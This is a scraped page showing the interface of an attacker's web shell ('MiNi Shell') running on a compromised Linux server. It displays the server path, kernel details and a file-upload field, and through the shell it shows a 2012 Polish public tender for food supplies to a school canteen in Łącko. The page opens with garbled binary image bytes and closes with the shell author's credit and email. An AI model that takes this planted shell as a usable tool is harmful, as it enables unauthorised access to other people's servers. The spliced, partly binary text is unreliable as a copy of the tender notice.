JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121122/466026-N-2012.html

<p class="kh_header"><b>Łącko: Dostawę artykułów żywnościowych dla stołówki szkolnej przy
                                                 Zespole Szkolno - Gimnazjalnym w Łącku</b><br>
<b>Numer ogłoszenia: 466026 - 2012; data zamieszczenia: 22.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkolno-Gimnazjalny w Łącku , Łącko  284, 33-390 Łącko, woj. małopolskie, tel. 18 444 60 11, faks 18 444 60 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.republika.pl/zsg_lacko</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: szkoła publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawę artykułów żywnościowych dla stołówki szkolnej przy
                                                 Zespole Szkolno - Gimnazjalnym w Łącku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet nr 1
15100000 - 9 produkty zwierzęce, mięso i przetwory mięsne 
                                                                      (mięso wieprzowe i wołowe),
15112000 - 6 drób,
1	BOCZEK WĘDZONY	kg	55
2	ĆWIARTKA Z KURCZAKA 	kg	288
3	FILET Z KURCZAKA	kg	480
4	FILET Z INDYKA	kg	72
5	PIECZEŃ WOŁOWA bk	kg	288
6	GULASZ WOŁOWY	kg	72
7	KARCZEK WIEPRZOWY bk	kg	144
8	KIEŁBASA Toruńska	kg	108
9	KIEŁBASA Wiejska	kg	81
10	KIEŁBASA Żywiecka	kg	66
11	PIECZEŃ wieprzowa bk	kg	53
12	ŁOPATKA WIEPRZOWA bk	kg	180
13	MIĘSO MIELONE WIEPRZOWE	kg	486
14	PORCJE ROSOŁOWE	kg	464
15	SCHAB b/k	kg	156
16	UDZIEC Z INDYKA	kg	84
17	ŻEBERKA wieprzowe 	kg	96
18	PARÓWKI HOD - DOG drobiowe	kg	70


Pakiet nr 2
                                            
15300000 - 1 warzywa, owoce i podobne produkty 
1	BURAK ĆWIKŁOWY	kg	185
2	CEBULA	kg	194
3	CZOSNEK	szt	51
4	FASOLA JAŚ DUŻA	kg	85
5	GROCH OMIELANY	kg	30
6	JABŁKO	kg	48
7	KAPUSTA BIAŁA	kg	354
8	KAPUSTA KISZONA	kg	305
9	KAPUSTA CZERWONA	kg	150
10	KOPER	pęcz	96
11	MARCHEW	kg	580
12	PIECZARKI	kg	30
13	PIETRUSZKA	kg	155
14	PIETRUSZKA - NATKA	pęcz	152
15	POR	szt	217
16	KAPUSTA PEKIŃSKA	szt	96
17	SELER	kg	34
18	ZIEMNIAKI	kg	3595
Pakiet nr 3

15811000 - 6 pieczywo. 
1	CHLEB (krojony przenny) 0,60 kg	szt	1950
Pakiet nr 4
 15220000 - 6 ryby mrożone, filety rybne i pozostałe mięso ryb,                                            
 15331170 - 9 i 15896000 - 5 warzywa mrożone i produkty gł. 
                                                                    mrożone. 
1	FASOLA SZPARAGOWA	kg	50
2	FILET Z RYBY Dorsz	kg	162
3	KALAFIOR	kg	72
4	MARCHEW kostka	kg	100
5	BRUKSELKA	kg	30
Pakiet nr 5
01242000 - 5 jaja, 
15000000 - 8 i 15800000 - 6 przyprawy i koncentraty,
15400000 - 2 oleje i tłuszcze zwierzęce lub roślinne, 
15800000 - 6 różne produkty spożywcze,
15500000 - 3 produkty mleczarskie. 
1	BUŁKA TARTA  400g	szt	174
2	GROSZEK KONSERWOWY 400g	szt	36
3	JAJA  	szt	3260
4	KASZA JĘCZMIENNA drobna 1kg	kg	146
5	KONCENTRAT BARSZCZU 0,3l	szt	30
6	KMINEK mielony 20g	szt	32
7	PRZYPRAWA warzywna do zup i potraw (warzywa suszone15,2%) 1 kg	kg	54
8	KUKURYDZA W PUSZCE  400g	szt	110
9	KWASEK CYTRYNOWY 20g	szt	134
10	LIŚĆ LAUROWY 20g	szt	26
11	PRZYPRAWA  do zup w płynie 1l	szt	36
12	MAKARON  świderki 0,5 kg (jaja 23,80%)	szt	66
13	MAKARON NITKI (pięciojajeczny) 250g 	szt	160
14	MARGARYNA  (tłuszcz palmowy 30%) 250g	szt	422
15	MASŁO 82% tłuszczu	szt	90
16	MĄKA  pszenna typ 500 wilgotność 15%	kg	163
17	SOK  ( 100% soku zagęszczonego owocowego) 200ml	szt	15420
18	OGÓRKI kiszone	szt	157
19	OLEJ  (rafinowany rzepakowy, z pierwszego tłoczenia 100%)1 litr	szt	134
20	PAPRYKA SŁODKA  20g	szt	29
21	PIEPRZ MIELONY 50g  	szt	202
22	KONCENTRAT POMIDOROWY  (30%)1 litr	szt	135
23	RYŻ  (biały długoziarnisty) 1 kg	kg	67
24	SÓL JODOWANA (warzona spożywcza)  1 kg	kg	95
25	SÓL ZIOŁOWA 20g	szt	84
26	ŚMIETANA 18% 400g	szt	1060
27	ZIELE ANGIELSKIE 20g	szt	30
28	ZUPA GRZYBOWA 40g 	szt	245
29	ŻUREK ŚLĄSKI 40g (mąka żytnia 40%, boczek wieprzowy 10%)	szt	210
30	ZIOŁA PROWANSALSKIE	szt	15
31	PAPRYKA KONSERWOWA 1l	szt	48.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne ubiegać się mogą Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy PZP tj:
posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.Wykonawcy przedłożą oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z załącznikiem nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne ubiegać się mogą Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy PZP tj:	posiadają wiedzę i doświadczenie niezbędne do wykonania zamówienia.
Wykonawcy przedłożą oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z załącznikiem nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne ubiegać się mogą Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy PZP tj:		dysponują odpowiednim potencjałem technicznym do wykonania zamówienia, 
Wykonawcy przedłożą oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z załącznikiem nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne ubiegać się mogą Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy PZP tj:		dysponują osobami zdolnymi do wykonania zamówienia, 
Wykonawcy przedłożą oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z załącznikiem nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne ubiegać się mogą Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy PZP tj:	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
Wykonawcy przedłożą oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z załącznikiem nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony formularz ofertowy (załącznik nr 1),
2)	w sytuacji wykonawców działających przez pełnomocnika - pełnomocnictwo,
3)	w sytuacji oferty złożonej przez Wykonawców występujących wspólnie pełnomocnictwo dla podmiotu uprawnionego do występowania w imieniu grupy Wykonawców zgodnie z art. 23 ust. 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych,
4)	zaakceptowany wzór umowy (załącznik nr 5).
5)	Oświadczenie wykonawcy o braku podstaw wykluczenia z powodu niespełnienia warunków (załącznik nr 6)
6)Oświadczenie, że osoby które zajmują się dostawą towaru posiadają aktualne badania do celów sanitarno - epidemiologicznych,
7)Oświadczenie potwierdzające, że oferowane artykuły są dopuszczone do obrotu na terenie Polski zgodnie z ustawą o warunkach zdrowotnych żywności i żywienia oraz że wykonawca rozpoczął wdrażanie systemu HCCP w zakładzie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.republika.pl/zsg_lacko<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkolno-Gimnazjalny
33-390 Łącko  284 /sekretariat/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.11.2012 godzina 09:00, miejsce: Zespół Szkolno-Gimnazjalny
33-390 Łącko  284 /sekretariat/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 15100000 - 9 produkty zwierzęce, mięso i przetwory mięsne 
                                                                      (mięso wieprzowe i wołowe),
                                               15112000 - 6 drób,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)BOCZEK WĘDZONY	kg	55
2)ĆWIARTKA Z KURCZAKA 	kg	288
3)FILET Z KURCZAKA	kg	480
4)FILET Z INDYKA	kg	72
5)PIECZEŃ WOŁOWA b/k	kg	288
6)GULASZ WOŁOWY	kg	72
7)KARCZEK WIEPRZOWY b/k	kg	144
8)KIEŁBASA Toruńska	kg	108
9)KIEŁBASA Wiejska	kg	81
10)KIEŁBASA Żywiecka	kg	66
11)PIECZEŃ wieprzowa b/k	kg	53
12)ŁOPATKA WIEPRZOWA b/k	kg	180
13)MIĘSO MIELONE WIEPRZOWE	kg	486
14)PORCJE ROSOŁOWE	kg	464
15)SCHAB b/k	kg	156
16)UDZIEC Z INDYKA	kg	84
17)ŻEBERKA wieprzowe 	kg	96
18)PARÓWKI HOD - DOG drobiowe	kg	70.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 15300000 - 1 warzywa, owoce i podobne produkty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)BURAK ĆWIKŁOWY	kg	185
2)CEBULA	kg	194
3)CZOSNEK	szt	51
4)FASOLA JAŚDUŻA	kg	85
5)GROCH OMIELANY	kg	30
6)JABŁKO	kg	48
7)KAPUSTA BIAŁA	kg	354
8)KAPUSTA KISZONA	kg	305
9)KAPUSTA CZERWONA	kg	150
10)KOPER	pęcz	96
11)MARCHEW	kg	580
12)PIECZARKI	kg	30
13)PIETRUSZKA	kg	155
14)PIETRUSZKA - NATKA	pęcz	152
15)POR	szt	217
16)KAPUSTA PEKIŃSKA	szt	96
17)SELER	kg	34
18)ZIEMNIAKI	kg	3595.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> 15811000 - 6 pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)CHLEB (krojony przenny) 0,60 kg	szt	1950.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> 15220000 - 6 ryby mrożone, filety rybne i pozostałe mięso ryb, 
                                               15331170 - 9 i 15896000 - 5 warzywa mrożone i produkty gł. 
                                                                    mrożone..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)FASOLA SZPARAGOWA	kg	50
2)FILET Z RYBY Dorsz	kg	162
3)KALAFIOR	kg	72
4)MARCHEW /kostka	kg	100
5)BRUKSELKA	kg	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6, 15.33.11.70-9, 15.89.60.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> 01242000 - 5 jaja, 
                                               15000000 - 8 i 15800000 - 6 przyprawy i koncentraty,
                                               15400000 - 2 oleje i tłuszcze zwierzęce lub roślinne, 
                                               15800000 - 6 różne produkty spożywcze,
                                               15500000 - 3 produkty mleczarskie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)BUŁKA TARTA  400g	szt	174
2)GROSZEK KONSERWOWY 400g	szt	36
3)JAJA  	szt	3260
4)KASZA JĘCZMIENNA drobna 1kg	kg	146
5)KONCENTRAT BARSZCZU 0,3l	szt	30
6)KMINEK mielony 20g	szt	32
7)PRZYPRAWA warzywna do zup i potraw (warzywa suszone15,2%) 1 kg	kg	54
8)KUKURYDZA W PUSZCE  400g	szt	110
9)KWASEK CYTRYNOWY 20g	szt	134
10)LIŚĆ LAUROWY 20g	szt	26
11)PRZYPRAWA  do zup w płynie 1l	szt	36
12)MAKARON  świderki 0,5 kg (jaja 23,80%)	szt	66
13)MAKARON NITKI (pięciojajeczny) 250g 	szt	160
14)MARGARYNA  (tłuszcz palmowy 30%) 250g	szt	422
15)MASŁO 82% tłuszczu	szt	90
16)MĄKA  pszenna typ 500 wilgotność 15%	kg	163
17)SOK  ( 100% soku zagęszczonego owocowego) 200ml	szt	15420
18)OGÓRKI kiszone	szt	157
19)OLEJ  (rafinowany rzepakowy, z pierwszego tłoczenia 100%)1 litr	szt	134
20)PAPRYKA SŁODKA  20g	szt	29
21)PIEPRZ MIELONY 50g  	szt	202
22)KONCENTRAT POMIDOROWY  (30%)1 litr	szt	135
23)RYŻ  (biały długoziarnisty) 1 kg	kg	67
24)SÓL JODOWANA (warzona spożywcza)  1 kg	kg	95
25)SÓL ZIOŁOWA 20g	szt	84
26)ŚMIETANA 18% 400g	szt	1060
27)ZIELE ANGIELSKIE 20g	szt	30
28)ZUPA GRZYBOWA 40g 	szt	245
29)ŻUREK ŚLĄSKI 40g (mąka żytnia 40%, boczek wieprzowy 10%)	szt	210
30)ZIOŁA PROWANSALSKIE	szt	15
31)PAPRYKA KONSERWOWA 1l	szt	48.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.24.20.00-5, 15.00.00.00-8, 15.80.00.00-6, 15.40.00.00-2, 15.80.00.00-6, 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com